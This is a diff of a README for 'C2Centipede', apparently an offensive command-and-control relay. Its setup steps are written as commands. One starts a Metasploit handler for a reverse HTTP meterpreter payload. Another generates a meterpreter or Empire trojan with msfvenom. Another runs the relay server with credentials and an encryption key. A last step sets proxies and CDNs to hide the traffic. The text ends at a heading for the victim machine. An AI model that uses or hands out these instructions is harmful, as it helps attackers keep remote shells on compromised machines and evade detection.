deepsight/C2Centipede/README.md

 1) Run your handler /msfconsole -x "use exploit/multi/handler;set payload python/meterpreter_reverse_http;set exitonsession false; set lport 8888; set lhost 0.0.0.0; run -j
 You can use any reverse HTTP payload, not just python.

+2)Generate your meterpreter (with msfvenom), empire or other trojan pointing to localhost and the port specified on the -p argument you will use in the c2centipede client (in this case 2233)

-2) python3 c2c_server.py -p 9093 -d 127.0.0.1:8888 -a lalala:lelele -b -f xkJSFO2DKQyYxj9F6Q4XCXIviiFuxNzZjsEfNc9NgoM=
+3) python3 c2c_server.py -p 9093 -d 127.0.0.1:8888 -a lalala:lelele -b -f xkJSFO2DKQyYxj9F6Q4XCXIviiFuxNzZjsEfNc9NgoM=
 -p port to listen to
 -d destination of the packages (This would be your MSF or Empire handler address) -a authentication for the c2centipede server, the operator needs to know these to send commands to the c2centipede server.
 -b beep (for debugging, you can listen to the beacons of your trojan) -f Fernet key, symmetric shared with the client. (if not specified it will generate a new one)

-3)Set your RFP proxies and/or CDNs.
+4)Set your RFP proxies and/or CDNs.

 ### On the victim machine